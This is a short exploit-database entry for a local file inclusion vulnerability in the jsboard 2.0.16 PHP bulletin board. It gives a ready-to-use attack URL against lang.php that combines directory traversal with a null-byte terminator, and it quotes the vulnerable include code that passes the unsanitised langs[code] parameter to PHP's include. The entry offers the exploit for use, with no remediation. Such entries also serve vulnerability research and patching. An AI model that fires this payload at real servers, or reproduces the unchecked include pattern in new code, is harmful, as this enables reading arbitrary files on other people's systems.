jsboard 2.0.16 Local File Include Vulnerability

2014-05-27T00:00:00
ID 1337DAY-ID-22287
Type zdt
Reporter JiKo
Modified 2014-05-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ----------[exploit Debut]
[Local File Include Vulnerability]
----------[Script Info]
 
Author	    : JIKO
 
----------[Script Info]
 
Site	    : http://kldp.net/projects/jsboard/
Version     : 2.0.16
Download    : http://kldp.net/frs/download.php/6058/jsboard-2.0.16.tar.gz
 
----------[exploit Info]
 
Exploit :
http://Path/include/lang.php?langs[code]=../../../COPYING%00

Line : 13-17
Page : lang.php
Code :

if ($langs['code']) {
  if (file_exists("$locate/{$langs['code']}.php")) {
    include "$locate/{$langs['code']}.php";
  } else { include "$locate/en.php"; }
} else { include "$locate/en.php"; }

----------[exploit Fin]

#  0day.today [2018-03-01]  #